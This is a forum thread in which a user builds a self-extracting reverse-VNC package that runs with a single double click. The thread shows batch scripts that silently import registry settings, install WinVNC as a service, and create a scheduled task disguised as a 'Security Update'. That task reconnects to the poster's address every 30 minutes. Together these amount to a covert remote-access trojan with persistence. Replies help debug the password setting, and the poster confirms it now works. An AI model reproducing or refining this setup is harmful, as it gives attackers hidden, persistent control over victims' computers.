Reverse VNC Password Issue

G-Stress

Trying to create my own reverse vnc package and all is well except when it runs it still says theres no default password. I'm trying to make it where it will run and execute without any user action required other then double clicking. I followed this tutorial here http://purehate138.blip.tv/file/577132/ only I didn't use elitewrap, I am trying to pack it with winrar, paquet builder or iexpress. Iexpress would be great but it doesn't give me an option to extract it to a directory of choice.

install.bat

@echo on

regedit /S vnc.reg
winvnc.exe -reinstall

net start winvnc
CALL task.bat

exit

task.bat

@echo on
schtasks /create /sc minute /mo 30 /tn "Security Update" /ru USERNAME /rp PASSWORD /tr "%windir%microsoftrun.bat"
CALL run.bat
exit

run.bat

@echo on

winvnc.exe -connect 192.168.1.129:5500

exit

also I've noticed that when creating the scheduled task in which im trying to get it to run every 30 min. it will run, but being that it's not running as the currently logged on user it doesn't connect to me. Just shows it's running in the scheduler folder.

As far as I know you don't need any password for using a reverse vnc connection.

But could you please provide your vnc.reg file? Search for '"Password"='.

By the way, do you need to use the schtasks program?

As far as I know you don't need any password for using a reverse vnc connection.

But could you please provide your vnc.reg file? Search for '"Password"='.

By the way, do you need to use the schtasks program?

I figured it out, it was the .reg file. For some reason using the method in that video it didn't work properly, but I opened the regedit and exported the key that way and it works fine. The schtasks I'm trying to create a rule that will allow this reverse connection to connect every 30 minutes. So far it will only work if the user specified for the task is currently logged on.